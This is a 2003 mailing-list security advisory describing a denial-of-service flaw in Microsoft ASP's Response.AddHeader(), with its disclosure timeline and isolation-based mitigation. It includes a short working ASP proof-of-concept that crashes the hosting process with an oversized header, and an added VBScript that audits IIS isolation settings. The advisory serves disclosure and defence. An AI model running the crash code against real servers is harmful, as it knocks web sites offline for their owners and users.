Microsoft Active Server Pages DoS

From: Parcifal Aertssen (parcifal@AQTRONIX.COM)
Date: 04/19/03

    Date:         Sat, 19 Apr 2003 00:18:37 +0200
    From: Parcifal Aertssen <parcifal@AQTRONIX.COM>
    To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
    
    

    AQTRONIX Security Advisory AQ-2003-01
    =====================================

    Topic: Microsoft Active Server Pages DoS

    Release date: 18 April 2003

    Systems Tested: Windows 2000 Server Family + SP3 + MS02-062

    Affected Systems: IIS 4.0, IIS 5.0, IIS 5.1 with ASP 3.0 installed (I did
    not test previous versions of ASP).
    I also tested ASP.NET but it doesn't seem vulnerable. So all systems with
    the "asp.dll" present are vulnerable.

    Mitigating factors: in order to execute the exploit a user would need to be
    able to upload or change an asp file to the affected server and execute it.

    Category: Denial of Service

    Vendor URL: http://www.microsoft.com

    Author: Parcifal Aertssen

    This document (and updates) is available at:
    http://www.aqtronix.com/Advisories/AQ-2003-01.txt

    Introduction
    ============

    Microsoft's Active Server Pages contains a flaw that can be used to crash
    the ASP application, resulting in a denial of service. A malicious user
    would need to be able to upload or change an ASP file and execute it to
    exploit this bug.

    Details
    =======

    Microsoft's Active Server Pages is a web technology that lets you easily
    create dynamic web pages and complete web-based applications. Pages are
    coded in a scripting language such as VBScript. To work with the web-based
    parts, ASP adds objects whose functions you can call and whose properties
    you can set. One of the functions of the Response object contains a flaw
    that can be used to overflow the stack: Response.AddHeader(). This function
    takes a header name and a header value as its parameters. If one of those
    values is a very long string (more than 350000 characters), the ASP
    application crashes as a result of excessive stack usage. The dllhost.exe
    process hosting the ASP application crashes, and with it the web site using
    that application and the other ASP applications in the same pool. The next
    request for the web site will cause the ASP application to restart (but you
    lose all application/session state and variables) or, if you have
    application caching enabled, the next request will result in the error
    message "The remote procedure call failed and did not execute." or "The RPC
    server is unavailable." More requests will eventually restart the
    application.

    Warning: if you run ASP "in-process", inetinfo.exe itself will fail. This
    means that your complete web server will crash (and restart if you have
    IIS 5).

    Exploit
    =======

    <%
    Dim i, r
    For i=1 to 3500
     'each time append 100 characters (literal split over two lines)
     r = r + "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" + _
         "aaaaaaaaaaaaaaaaaaaaaaaaa"
    Next

    Response.AddHeader "random-header:", r 'this is where it crashes
    %>

    Solution
    ========

    None. You can however limit the DoS by running each ASP application as
    "Isolated".
    Microsoft told me that this patch was going to be included in the next
    cumulative patch, which they would release in February. They didn't; they
    said that they still had a lot of testing to do together with the other
    issues in the cumulative patch. Since February I haven't heard from them.
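
One way to check the isolation setting this section refers to, as an added example that is not part of the original advisory: a Windows Script Host VBScript that walks the IIS metabase through ADSI and prints the AppIsolated mode of every web application. It assumes IIS 5.x on the local machine with the IIS ADSI provider available, and that AppRoot is stored as "/LM/W3SVC/<site>/Root/..."; the script name is hypothetical.

```vbscript
' Added example, not from the advisory. Lists each IIS web application with its
' isolation mode so in-process and pooled applications can be reviewed.
' Run on the IIS server: cscript //nologo asp-isolation-audit.vbs
Option Explicit
Const W3SVC = "IIS://localhost/W3SVC"

' Map the AppIsolated metabase value to the crash scope the advisory describes.
Function IsolationLabel(mode)
    Select Case mode
        Case 0
            IsolationLabel = "in-process: a crash takes down inetinfo.exe"
        Case 1
            IsolationLabel = "isolated: a crash is limited to this application"
        Case 2
            IsolationLabel = "pooled: a crash takes down every pooled application"
        Case Else
            IsolationLabel = "unrecognised AppIsolated value " & mode
    End Select
End Function

' Report the node if it is an application root, then recurse into its children.
Sub AuditNode(adsPath)
    Dim node, child, metaPath
    Set node = GetObject(adsPath)
    ' AppRoot names the application a node belongs to (possibly inherited);
    ' the node is an application root only when AppRoot is the node's own path.
    metaPath = "/LM" & Mid(adsPath, Len("IIS://localhost") + 1)
    If StrComp(node.AppRoot, metaPath, vbTextCompare) = 0 Then
        WScript.Echo "  " & metaPath & " -> " & IsolationLabel(node.AppIsolated)
    End If
    For Each child In node
        If child.Class = "IIsWebVirtualDir" Or child.Class = "IIsWebDirectory" Then
            AuditNode adsPath & "/" & child.Name
        End If
    Next
End Sub

Dim svc, site
Set svc = GetObject(W3SVC)
For Each site In svc
    If site.Class = "IIsWebServer" Then
        WScript.Echo "Site " & site.Name & " (" & site.ServerComment & ")"
        AuditNode W3SVC & "/" & site.Name & "/Root"
    End If
Next
```

Applications reported as in-process or pooled are the ones where the crash described under Details reaches beyond a single application.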

    History
    =======

    2002.11.04 Found the vulnerability.
    2002.11.07 Mailed it to Microsoft.
    2003.01.14 Received private patch which worked.
    2003.02.10 Received a mail that they still had a lot of testing to do.
    2003.04.18 Released initial advisory

    Disclaimer
    ==========

    The information in this advisory and any of its demonstrations is provided
    "as is" without warranty of any kind.

    AQTRONIX is not liable for any direct or indirect damages caused as a result
    of using the information or demonstrations provided in any part of this
    advisory.
